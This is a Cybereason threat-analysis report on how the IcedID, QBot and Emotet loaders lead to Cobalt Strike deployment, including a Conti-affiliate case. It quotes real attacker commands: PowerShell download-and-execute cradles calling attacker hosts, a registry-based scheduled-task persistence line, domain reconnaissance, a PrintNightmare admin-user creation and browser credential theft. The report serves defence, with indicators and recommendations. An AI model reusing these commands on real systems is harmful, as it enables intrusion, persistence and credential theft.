# THREAT ANALYSIS REPORT: All Paths Lead to Cobalt Strike - IcedID, Emotet and QBot **[cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot](https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot)** Written By Cybereason Global SOC Team February 10, 2022 | 13 minute read ----- [The Cybereason Global Security Operations Center Team (GSOC) issues Cybereason Threat Analysis reports to](https://www.cybereason.com/blog/authors/cybereason-global-soc-team) inform on impacting threats. The Threat Analysis reports investigate these threats and provide practical recommendations for protecting against them. In this Threat Analysis report, the GSOC provides details about three recent attack scenarios where fast-moving [malicious actors used the malware loaders IcedID,](https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware) [QBot, and](https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike) [Emotet to deploy the Cobalt Strike framework on the](https://www.cybereason.com/blog/threat-alert-the-return-of-emotet) compromised systems. The deployment of Cobalt Strike as part of an attack significantly increases the severity of the attack due to the framework’s high damage potential. One of the attack scenarios that we discuss in this article involves affiliates of the [Conti ransomware group.](https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware) ## Key Points **Fast-moving adversaries: The threat actors conducted malicious activities in the compromised systems after** only approximately 8 minutes after infecting the systems with the malware loader IcedID, QBot, or Emotet. The malicious actors deployed Cobalt Strike up to approximately 2 hours after accessing the compromised systems. **[Targeted phishing emails: Malicious actors, who we attribute as affiliates of the Conti ransomware group,](https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware)** specifically targeted a user by sending the user an email with an attachment (an Excel document) that was almost identical to a legitimate email and email attachment already distributed to other users within the organization. The difference was that the attached Excel document contained a malicious macro that distributed IcedID. **Detected and prevented: The** [Cybereason XDR Platform effectively detects and prevents the IcedID, QBot,](https://www.cybereason.com/platform) and Emotet malware. **Cybereason Managed Detection and Response (MDR): The Cybereason GSOC has zero tolerance** towards attacks that involve malware loaders, such as IcedID, QBot, and Emotet, and categorizes such [attacks as critical, high-severity incidents. The Cybereason GSOC MDR Team issues a comprehensive report](https://www.cybereason.com/services/managed-detection-response-mdr) to customers when such an incident occurs. The report provides an in-depth overview of the incident, which helps scope the extent of compromise and the impact on the customer’s environment. In addition, the report provides attribution information when possible as well as recommendations for mitigating and isolating the threat. ## Introduction [Cobalt Strike is an adversary simulation framework with the primary use case of assisting red team operations.](https://www.cobaltstrike.com/) However, Cobalt Strike is also actively used by malicious actors for conducting post-intrusion malicious activities. Cobalt Strike is a [modular framework with an extensive set of features that are useful to malicious actors, such as](https://www.mandiant.com/resources/defining-cobalt-strike-components#:~:text=Cobalt%20Strike%20is%20a%20commercial,Advanced%20Persistent%20Threats%20(APTs).) command execution, process injection, and credential theft. The deployment of Cobalt Strike as part of an attack significantly increases the severity of the attack: for example, once Cobalt Strike runs on a compromised system, the Cobalt Strike operators can broker the system as an initial access point to other threat actors, including ransomware group affiliates. In the period between October 2021 and the time of writing this article, the Cybereason GSOC has observed multiple attack scenarios where malicious actors used malware that is capable of deploying additional malware on compromised systems (i.e. malware loaders) to deploy Cobalt Strike on the systems. In this article, we present the activities of the malware loaders and the malicious actors that operated the loaders in three selected attack scenarios. Each scenario involves one of the malware loaders IcedID, QBot, and Emotet, and results in the deployment of Cobalt Strike. One of the attack scenarios that we discuss in this article involves affiliates of the Conti ransomware group. ----- [Malicious actors use the IcedID malware to distribute various types of malware, including ransomware, to](https://www.cybereason.com/fundamentals/what-is-ransomware) compromised systems. Malicious actors typically infect systems with IcedID through attachments, usually Microsoft Office documents, in phishing emails. Once deployed on a system, IcedID uses legitimate system utilities to conduct malicious activities, such as reconnaissance activities and disabling security mechanisms. Malicious actors also use the IcedID malware to deploy Cobalt Strike on compromised systems. QBot, also known as Qakbot, is a malware that has been present on the threat landscape since 2007. QBot originally featured information stealing and trojan functionalities, however, the malicious actors that develop QBot have extended the malware with malware loading capabilities. In recent attack campaigns, malicious actors distribute QBot through malicious attachments in phishing emails. QBot downloads and executes additional [malware on compromised machines, such as the Cobalt Strike framework, and ransomware, such as REvil and](https://www.cybereason.com/blog/cybereason-vs.-revil-ransomware) [ProLock.](https://www.cybereason.com/blog/three-reasons-why-you-should-never-pay-ransomware-attackers) Since security researchers first discovered the Emotet malware in 2014, the malware has evolved from a traditional banking Trojan to a malware loader. Over the last few years, before authorities [disrupted the infrastructure of](https://www.europol.europa.eu/media-press/newsroom/news/world%E2%80%99s-most-dangerous-malware-emotet-disrupted-through-global-action) Emotet operators as part of a global operation in the first quarter of 2021, malicious actors have been using Emotet to deliver the Ryuk ransomware to compromised systems. [On November 15, 2021, security researchers announced the discovery of a new variant of Emotet on the threat](https://twitter.com/gdata_adan/status/1460298879090503681) [landscape. The Cybereason GSOC team observed attack scenarios that involved the new Emotet malware shortly](https://www.cybereason.com/blog/threat-alert-the-return-of-emotet) thereafter, which involved Emotet deploying Cobalt Strike on compromised systems. ## Analysis ### From IcedID to Cobalt Strike: Conti Ransomware Affiliates The figure below depicts an infection using the IcedID malware that results in the deployment of Cobalt Strike. In this scenario, the malicious actors, who we attribute as affiliates of the [Conti ransomware group, specifically](https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware) targeted a user by sending the user an email with an attachment (an Excel document) that is almost identical to a legitimate email and email attachment already distributed to other users within the organization. The difference was that the attached Excel document contained a malicious macro. This indicates a potential longterm presence of the actors in the environment: ----- _infection using the IcedID malware_ When the targeted user executed the macro, the macro downloaded the executable file of the IcedID malware from an attacker-controlled endpoint and then executed the file. The macro downloaded the IcedID executable to the home directory of the user, such as C:\Users\test\javabridge64.exe, where javabridge64.exe is the name of the IcedID executable and C:\Users\test is the home directory of the user test: _Malicious Office macro executes IcedID javabridge64.exe as seen in the Cybereason XDR Platform_ Approximately 8 minutes after the malicious Office macro executed IcedID, the malicious actors executed the _[SysInfo IcedID command to enumerate relevant system information, such as active processes, and to conduct the](https://www.binarydefense.com/icedid-gziploader-analysis/)_ following reconnaissance activities: ----- IcedID executed the following command to retrieve a list of the security solutions that are installed on the compromised system: _wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List_ IcedID executed the command ipconfig /all to retrieve the networking configuration of the compromised system. IcedID executed the systeminfo.exe Windows utility to retrieve detailed information about the compromised system, such as operating system version and hardware configuration. IcedID executed the following commands to retrieve Active Directory (AD)-related information: _net view /all_ _net view /all /domain_ _net config workstation_ _net group "Domain Admins" /domain_ _nltest /domain_trusts_ _nltest /domain_trusts /all_trusts_ ----- _IcedID reconnaissance activities as seen in the_ _Cybereason XDR Platform_ [Approximately 20 minutes after conducting reconnaissance activities, the malicious actors executed the ExecAdmin](https://www.binarydefense.com/icedid-gziploader-analysis/) IcedID command that attempts to elevate user privileges using a known Windows User Account Control (UAC) bypass that leverages the fodhelper Windows utility. [After approximately 5 minutes, the malicious actors executed the Exec IcedID command to execute code by](https://www.binarydefense.com/icedid-gziploader-analysis/) injecting the code into a cmd.exe instance. Approximately 21 minutes later, the malicious actors executed a Cobalt Strike loader using the command rundll32 adobe.dll,kasim (where kasim is a dynamic-link library - DLL - entry point): ----- _Execution of Cobalt Strike loader as seen in the Cybereason XDR Platform_ A few minutes after executing the Cobalt Strike loader, the actors downloaded and executed PowerShell code from the attacker-controlled endpoint with an IP address of 185.70.184[.]8 by executing the PowerShell command: _IEX ((new-object net.webclient).downloadstring('http://185.70.184[.]8:80/a'))._ [This attributes the actors as Conti affiliates, since the Conti group operated the endpoint with the IP address](https://twitter.com/AltShiftPrtScn/status/1467323259137974273) _185.70.184[.]8 in the week when the attack that we discussed took place. In addition, the security community has_ [observed Conti affiliates using the IcedID malware to deploy Cobalt Strike on compromised systems.](https://thedfirreport.com/2021/05/12/conti-ransomware/) To deploy the IcedID malware, the Conti affiliates targeted a particular user. At a larger scale, in the middle of 2021, we observed malicious actors deploying the IcedID malware on systems as part of the “stolen images evidence” campaign, which we discuss in the following section. **Stolen Images Evidence Campaign** [This “stolen images evidence” campaign involved phishing emails that legitimate organization contact forms had](https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/) generated and sent to the targeted users – the contact form recipient. The emails contained legal threats related to copyright infringement due to the use of copyright-protected images that the targeted user had apparently stolen. The emails urged the recipient to sign into a Google page that supposedly lists the images. After the user signed into the page using valid Google credentials, the page downloaded and executed a malicious JavaScript (.js) script using the Windows wscript utility. The script executed a Base64-encoded PowerShell command to download and execute the IcedID malware, for example: _IEX(New-Object Net.WebClient).downloadString('http://minerdone[.]top/222g100/index.php’)._ The execution of this PowerShell command led to downloading and executing a DLL through the DllRegisterServer entry point, such as: _rundll32.exe C:\Users\user\AppData\Local\Temp\VhfNmz.dat,DllRegisterServer._ This DLL conducted the first stage of deployment of the IcedID malware and we refer to it as first-stage IcedID DLL: ----- _Download and execution of first-stage IcedID DLL as seen in the Cybereason XDR Platform_ The first-stage DLL gathered information about the compromised machine, such as hardware and operating system information, and downloaded data from an attacker-controlled endpoint, such as grenademetto[.]uno. The data was encrypted using a symmetric encryption key. The first-stage IcedID DLL decrypted the data that it had downloaded, which contained a DLL file and a data file that typically had the name license.dat. The first-stage IcedID DLL typically wrote the DLL file in the user’s _%LocalAppData% directory, such as:_ _C:\Users\user\AppData\Local\Temp\rebuildx32.tmp, and the license.dat file in the user’s %AppData% directory._ The first-stage IcedID DLL then executed the DLL file, such as: _rundll32.exe “C:\Users\user\AppData\Local\Temp\rebuildx32.tmp",update /i:"ApproveFinish\license.dat", which we_ refer to as second-stage IcedID DLL. The main functionality of the second-stage IcedID DLL was to locate and process the license.dat file. license.dat contained encrypted content that implemented the IcedID malware. The second-stage IcedID DLL decrypted the content of license.dat and executed the IcedID malware by injecting the malware into a legitimate Windows process, such as chrome.exe: _Second-stage IcedID DLL_ _injects IcedID into chrome.exe as seen in the Cybereason XDR Platform_ ### From QBot to Cobalt Strike ----- The figure below depicts an infection using the QBot malware that results in the deployment of Cobalt Strike: _An infection using the QBot malware_ Malicious actors distribute QBot as attachments, typically Microsoft Office Excel documents, to phishing emails. The Office Excel application prompts the user that has opened the document that distributes QBot to enable Office macro execution. When the Office macro executes, the macro first downloads the QBot malware from an attackercontrolled endpoint and then executes the malware. In the attack scenario that we analyzed, the macro stored the file that implements the QBot malware in the _%ProgramData% directory, such as C:\ProgramData, with the filename extension .ocx - Volet1.ocx (other names_ include, for example, Volet2.ocx and Volet3.ocx). The .ocx file was a Windows DLL file that the macro executed using the regsvr32 Windows utility. The DLL unpacked and loaded a Windows DLL named stager_1.dll that implements the main QBot functionalities. In addition, the DLL injected stager_1.dll into a legitimate Windows process - msra.exe: ----- _Office_ _Excel macro executes QBot as seen in the Cybereason XDR Platform_ Approximately 6 minutes after injecting stager_1.dll into msra.exe, Qbot conducted reconnaissance activities by [executing the commands net,](https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/net-commands-on-operating-systems) [arp,](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/arp) [ipconfig,](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ipconfig) [netstat,](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/netstat) [nslookup,](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/nslookup) [route, and](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/route_ws2008) [whoami. The figure below depicts the](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami) execution of these commands, including command line parameters: ----- _Qbot reconnaissance activities as seen in the Cybereason XDR Platform_ Approximately 1 minute after conducting reconnaissance activities, QBot established persistence on the compromised system by executing the following command: _schtasks.exe /Create /F /TN "{AO8F7C8F-D95F-4395-8732-9818EO0F3DB2}" /TR "cmd /c start /min \"\"_ _powershell.exe -Command_ _IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path_ _HKCU:\SOFTWARE\Cvdijvkees).omowidpdnpcwb))) " /SC MINUTE /MO 30_ This command creates a scheduled task named {AO8F7C8F-D95F-4395-8732-9818EO0F3DB2} that periodically executes Base64-encoded PowerShell code stored in the registry key _HKEY_CURRENT_USER\SOFTWARE\Cvdijvkees._ [Approximately 48 minutes after creating a scheduled task, Qbot injected Rubeus, a tool for attacking Kerberos](https://github.com/GhostPack/Rubeus) deployments, into the legitimate Windows Update process wuauclt.exe. After approximately 18 minutes, QBot stole [web browser data, such as cookies and browsing history, using the recovery functionality of the esentutl Windows](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875546(v=ws.11)) utility. [After approximately 2 minutes, QBot attempted to exploit the PrintNightmare vulnerability by executing the](https://www.cybereason.com/blog/threat-alert-printnightmare-critical-vulnerability-in-windows-print-spooler) _Invoke-_ _Nightmare PowerShell command to create an administrative user with the username admin1 and password_ _Password._ After approximately 48 minutes, QBot injected a Cobalt Strike module into msra.exe that contacted attackercontrolled endpoints known to be associated with Cobalt Strike at the time the attack took place: ----- _Qbot uses the esentutl Windows utility to steal web browser data (in the Cybereason XDR Platform)_ _Qbot injects Rubeus into wuauclt.exe and executes Invoke-Nightmare as seen in the Cybereason XDR Platform_ ### From Emotet to Cobalt Strike The figure below depicts an infection using the Emotet malware that results in the deployment of Cobalt Strike: ----- _An infection using the Emotet malware_ Malicious actors distribute Emotet as attachments, typically Microsoft Office Word or Excel documents, to phishing emails. In addition to Office documents, malicious actors distribute Emotet through links that lead to Office documents, archive files that store Office documents, and Universal Windows Application installation packages that download and execute Emotet when a user executes the installation package: ----- _Phishing email with attached Microsoft Word doc that distributes Emotet_ **Distribution: Office Word Document** If an Office Word document distributes Emotet, the Office Word application first prompts the user that has opened the document to enable Office macro execution: _Office Word_ _application prompts a user to enable macro execution_ ----- When the user enables macro execution, a malicious Office macro that is part of the Word document and that distributes Emotet executes. The macro first deobfuscates macro code by removing character arrays, such as Cew (see the figure below), and then executes the deobfuscated macro code: _Implementation of a malicious macro that distributes Emotet_ The de-obfuscated macro code executes PowerShell code. The PowerShell code establishes a connection to an attacker-controlled endpoint and downloads Emotet to the %ProgramData% directory, such as C:\ProgramData. Emotet typically arrives from the attacker-controlled endpoint in the form of a DLL file that the PowerShell code stores under a random filename in the %ProgramData% directory. The PowerShell code then uses the rundll32 Windows utility to execute Emotet: _De-obfuscated macro code executes PowerShell that downloads and executes Emotet as seen in the Cybereason_ _XDR Platform_ Alternatively to executing the PowerShell code directly, the de-obfuscated macro code may first create a Windows Batch (.bat) file in the %ProgramData% directory under a random name, such as C:\ProgramData\sdfhiuwu.bat or _yksds.bat, and then execute the file. The .bat file stores obfuscated code that includes Base-64 encoded code and_ code that is stored in multiple string variables. The obfuscated code in the .bat file executes the PowerShell code that downloads and then uses the rundll32 Windows utility to execute Emotet: ----- _De-obfuscated macro code creates a Windows Batch file_ _A Windows batch (.bat) file that contains obfuscated code_ ----- _Execution of .bat file (yksds.bat) that executes PowerShell code which downloads and executes Emotet as seen in_ _the Cybereason XDR Platform_ [The PowerShell code uses the rundll32 Windows utility and specifies the DLL entry point Control_RunDLL or](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32) _[DllRegisterServer to execute Emotet. We observed that rundll32 maps the Emotet DLL file under the internal name](https://docs.microsoft.com/en-us/windows/win32/menurc/versioninfo-resource)_ of X.dll: _rundll32 executes Emotet: DllRegisterServer DLL entry point as seen in the Cybereason XDR Platform_ _rundll32 maps an Emotet DLL file under the internal name of X.dll as seen in the Cybereason XDR Platform_ ----- **Distribution: Office Excel Document** If an Office Excel document distributes Emotet, the Office Excel application prompts the user that has opened the document to enable Office macro execution. The Excel document contains several hidden Excel worksheets that store malicious Office macros that distribute Emotet. When the user enables macro execution, the Office macros execute: _Office Excel_ _application prompts a user to enable macro execution_ The macros establish a connection to an attacker-controlled endpoint to download the Emotet malware. Emotet typically arrives from the attacker-controlled endpoint in the form of a DLL file that the macros store under a filename with the extension .ocx, such as besta.ocx, bestb.ocx, or bestc.ocx. The macros use the rundll32 Windows utility and specify the DLL entry point Control_RunDLL or DllRegisterServer to execute Emotet. The macros may obfuscate the DLL entry point name by appending the ampersand (&) character to individual characters of the name: ----- _rundll32 executes Emotet: DllRegisterServer DLL entry point as seen in the Cybereason XDR Platform_ **Malicious Activities** When Emotet executes on a compromised system, the malware first establishes persistence by creating system services that start at system startup or by creating registry values at the _HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run registry key:_ _Emotet (DLL file: oxneternhgbtah.ybc) establishes persistence on compromised system as seen in the Cybereason_ _XDR Platform_ Emotet then executes processes that conduct malicious activities. The processes that Emotet executes have random names and are children processes of the process of the rundll32 utility that executes Emotet. In the attack scenario that we analyzed, Emotet executed a process that steals cookies or web and email credentials from client credential databases. Emotet used the keyword scomma in the process command line to [execute WebBrowserPassView, a tool that steals web credentials from browser credential databases. Emotet then](https://www.virusbulletin.com/virusbulletin/2019/10/vb2019-paper-exploring-emotet-elaborate-everyday-enigma/) exfiltrated data from the compromised system to attacker-controlled endpoints: ----- _Emotet executes processes that conduct_ _malicious activities as seen in the Cybereason XDR Platform_ _Emotet executes the WebBrowserPassView tool as seen in the Cybereason XDR Platform_ _Emotet exfiltrates data as seen in the Cybereason XDR Platform_ ----- After Emotet exfiltrated data, the Emotet operators deployed the Cobalt Strike framework on the compromised system. Emotet deployed a Cobalt Strike beacon in the form of a DLL file and executed the beacon by invoking the _DllRegisterServer DLL entry point._ ## Detection and Prevention ### Cybereason XDR Platform [The Cybereason XDR Platform is able to detect and prevent IcedID, QBot, and Emotet using multi-layer protection](https://www.cybereason.com/platform) that detects and blocks malware with threat intelligence, machine learning, and Next-gen Antivirus (NGAV) capabilities: _Cybereason XDR_ _Platform detects IcedID injecting code into a cmd.exe instance_ _Cybereason XDR Platform detects IcedID executing a Cobalt Strike loader implemented in adobe.dll_ _Cybereason XDR Platform detects a malicious Office macro executing QBot using the regsvr32 Windows utility_ ----- _Cybereason XDR Platform detects a malicious Office Excel document that distributes Emotet_ ### Cybereason GSOC MDR The Cybereason GSOC recommends the following: [Enable the Anti-Malware feature in the Cybereason NGAV module and enable the Detect and Prevent modes](https://nest.cybereason.com/documentation/product-documentation/190/anti-malware-settings) of this feature. Securely handle email messages that originate from external sources. This includes disabling hyperlinks and investigating the content of email messages to identify phishing attempts. Threat Hunting with Cybereason: The Cybereason MDR team provides its customers with custom hunting queries for detecting specific threats - to find out more about threat hunting and Managed Detection and [Response with the Cybereason Defense Platform, contact a Cybereason Defender here.](https://www.cybereason.com/services/managed-detection-response-mdr#form) [For Cybereason customers: More details available on the NEST including custom threat hunting queries](https://nest.cybereason.com/knowledgebase/5191271) for detecting this threat. Cybereason is dedicated to teaming up with defenders to end cyber attacks from endpoints to the enterprise to [everywhere. Schedule a demo today to learn how your organization can benefit from an operation-centric approach](https://www.cybereason.com/request-a-demo) to security. ## Indicators of Compromise **Executables** SHA-1 hash: _a4d415c07b4ff77c6bd792c32fc46bfc6a1b0354_ SHA-1 hash: _e8992a283f9f37dec617b305db2790d9112d3a20_ ----- **Domains** _zasewalli[.]fun_ _endofyour[.]ink_ _pedrosimanez[.]fun_ _kingflipp[.]online_ _beliale232634[.]at_ _belialw869367[.]at_ _belialq449663[.]at_ **IP Addresses** _23.111.114[.]52_ _104.168.44[.]130_ _185.70.184[.]8_ ## MITRE ATT&CK Techniques **Initial Access** **Execution** **Persistence** **Defense** **Evasion** **Discovery** **Lateral** **Movement** Account Discovery Remote Services: [Remote](https://attack.mitre.org/techniques/T1021/001/) Desktop Protocol Domain [Trust](https://attack.mitre.org/techniques/T1482/) Discovery Network [Service](https://attack.mitre.org/techniques/T1046/) Scanning Remote [System](https://attack.mitre.org/techniques/T1018/) Discovery **Exfiltration** Exfiltration Over Alternative Protocol Phishing: [Spearphishing](https://attack.mitre.org/techniques/T1566/001/) Attachment User [Execution:](https://attack.mitre.org/techniques/T1204/002/) Malicious File Windows [Management](https://attack.mitre.org/techniques/T1047/) Instrumentation Scheduled Task/Job: Scheduled Task Abuse Elevation Control Mechanism: Bypass User Account Control Signed Binary [Proxy](https://attack.mitre.org/techniques/T1218/010/) Execution: Regsvr32 Signed Binary [Proxy](https://attack.mitre.org/techniques/T1218/011/) Execution: Rundll32 Modify registry **Credential** **Access** Credentials [from Web](https://attack.mitre.org/techniques/T1555/003/) Browsers ## About the Researchers: ----- **Eli Salem, Senior Security Analyst, Cybereason Global SOC** Eli is a lead threat hunter and malware reverse engineer at Cybereason. He has worked in the private sector of the cyber security industry since 2017. In his free time, he publishes articles about malware research and threat hunting. **Aleksandar Milenkoski, Senior Malware and Threat Analyst, Cybereason Global SOC** Aleksandar Milenkoski is a Senior Malware and Threat Analyst with the Cybereason Global SOC team. He is involved primarily in reverse engineering and threat research activities. Aleksandar has a PhD in system security. For his research activities, he has been awarded by SPEC (Standard Performance Evaluation Corporation), the Bavarian Foundation for Science, and the University of Würzburg, Germany. Prior to Cybereason, his work focussed on research in intrusion detection and reverse engineering security mechanisms of the Windows operating system. **Brian Janower, Security Analyst, Cybereason Global SOC** Brian Janower is a Security Analyst with the Cybereason Global SOC team. He is involved in malware analysis and triages security incidents effectively and precisely. Brian has a deep understanding of the malicious operations prevalent in the current threat landscape. He is in the process of obtaining a Bachelor of Science degree in Systems Information & Cyber. **Yonatan Gidnian, Senior Security Analyst and Threat Hunter, Cybereason Global SOC** Yonatan Gidnian is a Senior Security Analyst and Threat Hunter with the Cybereason Global SOC team. Yonatan analyses critical incidents and hunts for novel threats in order to build new detections. He began his career in the Israeli Air Force where he was responsible for protecting and maintaining critical infrastructures. Yonatan is passionate about malware analysis, digital forensics, and incident response. ----- Rotem Rostami, Security Analyst, Cybereason Global SOC Rotem Rostami is a Security Analyst with the Cybereason Global SOC (GSOC) team. She is involved in malware analysis activities and triages security incidents effectively and precisely. Rotem has a deep understanding of the malicious operations prevalent in the current threat landscape. Rotem has been working in the cybersecurity industry since 2018. About the Author **Cybereason Global SOC Team** The Cybereason Global SOC Team delivers 24/7 Managed Detection and Response services to customers on every continent. Led by cybersecurity experts with experience working for government, the military and multiple industry verticals, the Cybereason Global SOC Team continuously hunts for the most sophisticated and pervasive threats to support our mission to end cyberattacks on the endpoint, across the enterprise, and everywhere the battle moves. [All Posts by Cybereason Global SOC Team](https://www.cybereason.com/blog/authors/cybereason-global-soc-team) -----